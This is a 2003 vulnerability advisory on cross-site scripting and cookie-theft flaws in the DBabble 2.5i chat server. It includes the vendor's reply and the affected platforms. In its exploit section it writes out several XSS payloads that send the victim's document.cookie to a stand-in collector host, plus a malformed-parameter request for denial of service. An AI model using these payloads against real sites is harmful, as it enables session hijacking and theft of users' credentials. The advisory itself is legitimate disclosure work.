*first published on: http://members.lycos.co.uk/r34ct/
---------------------------------------------------------------------------------------------
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
----------------------------------------------------------------------------------------------------------------------

DBabble 2.5i XSS/Cookie Problem
12/09/2003
-by dr_insane (dr_insane@pathfinder.gr)
-http://members.lycos.co.uk/r34ct/


-------------------
Vendor Information:
-------------------
Homepage: http://www.netwinsite.com/
Vendor informed
Vender Response : None (yet?)

Here is the answer from the Vendor:
From matt@netwinsite.com Tue Sep 16 00 : 39:06 2003 
Return-Path : <matt@netwinsite.com> 
Received : from netwin.co.nz (smtp.netwin.co.nz [210.54.249.114]) by monster.phaistosnetworks.gr (8.12.9/8.12.5) with ESMTP id h8FLd2U5021801 for <dr_insane@pathfinder.gr>; Tue, 16 Sep 2003 00:39:04 +0300 
Received : from matt2 (unverified [10.0.0.26]) by netwin.co.nz (SurgeMail 1.5a) with ESMTP id 839253 for <dr_insane@pathfinder.gr>; Tue, 16 Sep 2003 09:37:04 +1200 
from : Matt Kearse <matt@netwinsite.com>    
X-Mailer : The Bat! (v1.63 Beta/7) 
Reply-To : support-dbabble@netwinsite.com 
Organization : NetWin Ltd 
X-Priority : 3 (Normal) 
Message-ID : <161352628853.20030916093758@netwinsite.com> 
To : "xxxx xxxxxx" <dr_insane@pathfinder.gr> 
Topic : Re: DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory 
In-Reply-To : <200309151304.h8FD4NHr008945@pegasus.phaistosnetworks.gr> 
References : <200309151304.h8FD4NHr008945@pegasus.phaistosnetworks.gr> 
MIME-Version : 1.0 
Content-type : text/plain; charset=ISO-8859-7 
Content-transfer-encoding : 8bit 
X-Server : High Performance Mail Server - http://surgemail.com 

Hi ,

Thanks for letting us know about these problems. We should have a
fixed version available within a day or two. I will let you know when
we do.

Regards,
Matt Kearse.

-------------------
Affected  Versions/systems:
-------------------
(Version 2.5i is vulnerable. Older versions may be vulnerable too)

Dbabble Solaris (Sparc) 
Dbabble Linux libc6/redhat 5/6
Dbabble Free BSD 
Dbabble MacOS X
Dbabble Freebsd
Dbabble AIX
Dbabble Windows NT/2000/XP/95/98/ME

NO VULNERABLE VERSIONS
- ?
-------------------
Description:
-------------------
DBabble is a chat, discussion, and instant messaging server and client, which allows users to send encrypted instant messages, have private conversations, and create and participate in private or public chat rooms and discussions. Users communicate with the chat server using either a web browser, or a client for Windows 95/98/ME/NT/2000/XP. Users can communicate with ICQ, MSN, Yahoo, and AIM (AOL) users, send instant messages to groups of users, receive email copies of their instant messages or new discussion group articles, and they can send and receive instant messaging from email addresses and mobile phones. Discussion groups/forums can optionally be linked to external usenet (NNTP) groups and/or made available to NNTP clients. A single DBabble chat server can support thousands of simultaneous online users and can optionally be isolated from outside communication.

I encountered XSS security holes in some scripts of Dbabble 2.5i and some other problems.


-----------------------------
Vulnerable Scripts/Exploit:
--------------------------------------------
(1)

http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK] 
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable to XSS ATTACK)

Another problem is that Dbabble uses cookies. So it is possible for someone to steal them using  XSS
attacks and some javascript.

Examples:

http://[HOST]/dbabble?cmd="><script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?
'%20+document.cookie</script>

http://[HOST]/dbabble?cmd=<script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>

http://[HOST]/dbabble?cmd=><script&gtdocument.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>

These are the examples of "evil" Javascript . These Javascript examples gather
the users cookie and then send a request to the yourhost.org website with the cookie in the
query .

When you access a hostile link with a xss attack in those scripts youur 
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other 
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can 
have more problems...


(2)
Another problem is that the parametre 'display' doesn't check the values it can accept. This can
lead to DOS attacks and other problems.

http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!



-----------------
| SoLuTiOnS |
-----------------

Update to the next Version:>

-----------
| CONTACT |
-----------

Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
Greece






----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------

______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
http://www.pathfinder.gr - ÄùñåÜí mail áðü ôïí Pathfinder!